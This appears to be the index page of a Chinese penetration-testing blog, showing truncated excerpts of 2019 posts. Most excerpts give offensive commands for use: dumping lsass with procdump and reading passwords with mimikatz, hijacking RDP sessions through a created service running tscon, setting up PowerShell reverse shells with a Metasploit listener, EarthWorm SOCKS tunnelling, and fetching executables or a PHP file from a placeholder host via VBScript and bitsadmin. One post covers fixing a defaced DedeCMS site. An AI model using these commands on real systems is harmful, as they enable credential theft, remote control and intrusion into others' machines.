Nmap常用命令

2019年08月06日  No comment

注:本为是笔记,参考多人的文章,仅供大家学习参考。原作者文章链接:https://www.cnblogs.com/hanxiaobei/p/5603491.htmlhttp://blog.jobbole.com/54595/----------------------------------------------------------------------------nmap是网络扫描和主机检测的工具。用nmap进行信息收集和检测漏洞,功能有:  检测存活主机。  检测主机开放端口(端口发
阅读全文 »

记一次曲折的获取网站路径

2019年07月28日  No comment

            网站php mysql 存在sql注入root权限 跑库的时候表是非常多常见的admin member user manage 都看完了 没有找到需要的数据 只能一个一个重新找  最后发现存在管理员的表的是一个不显眼的表里面,登录到后台发现后台只验证账号不验证密码。       &nb
阅读全文 »

powershell反弹shell 的几种方法

2019年07月20日  No comment

    如果想接收多个sessions的话,用msf执行以下命令进行监听    反弹成功以后,用sessions id 来选择要操作的目标    NC反弹msfconsole use exploit/multi/hanler set payload windows/shell/reverse_tcp set lhost 1
阅读全文 »

EarthWorm详细用法

2019年07月17日  No comment

正向socks v5服务器【适用于目标机器拥有一个外网IP】服务器端执行以下命令ew.exe -s ssocksd -l 888说明:服务器开启端口为888,SOCKS的代理。然后使用sockscap64添加这个IP的代理就可以使用了。-------------------------------------------------------------------------------------------反弹socks v5服务器【适用于目标机器没有公网IP,但可访问内网资源】本地执行
阅读全文 »

RDP劫持会话

2019年07月16日  No comment

RDP劫持会话sc create sesshijack binpath="cmd.exe /k tscon 1 /dest:rdp-tcp#46"1为要劫持的会话ID     dest为 sessionname net start sesshijack参考链接https://www.youtube.com/watch?v=OgsoIoWmhWw
阅读全文 »

用Procdump获取win密码

2019年07月16日  No comment

    Procdump出win密码procdump64.exe -accepteula -ma lsass.exe lsass.dmp将导出的日志利用 mimikatz 进行破解mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" 
阅读全文 »

常用的远程下载方法

2019年07月11日  No comment

常用的远程下载方法针对某些服务器禁止上传vbs下载文件Set Post = CreateObject("Msxml2.XMLHTTP") Set Shell = CreateObject("Wscript.Shell") Post.Open "GET","http://www.xxx.com/2.exe",0 Post.Send() Set
阅读全文 »

Bitsadmin 命令用法

2019年07月11日  No comment

bitsadmin 命令 传说这个命令的参数特别多 细说能写一本书那么厚记几个常用的就行了bitsadmin /transfer n http://www.xxx.com/1.txt d:\wwwroot\1.php   //下载1.txt到d盘命名为1.phpbitsadmin /list /verbose       &nb
阅读全文 »

Kali常用命令整理!更新中

2019年07月10日  No comment

kali 配置SSH修改sshd_configvi /etc/ssh/sshd_config将#PasswordAuthentication on 改为 yes将PermitRootLogin without-password 改为 PermitRootLogin yes启动ssh/etc/init.d/ssh start或者 service ssh start查看是否启动/etc/init.d/ssh statusservice ssh status设置ssh自启动update-rc
阅读全文 »

dede主页老是被篡改

2019年06月11日  No comment

    朋友公司的网站最近被劫持了跳转到了赌博网站,再三检查没有发现异常 如图网站被劫持后的      在三检查发现网站被加入了自定义标签 {dede:mytag typeid='0' name=''/}        解决办法:/dede/目录下  删除自定义标签管理  &n
阅读全文 »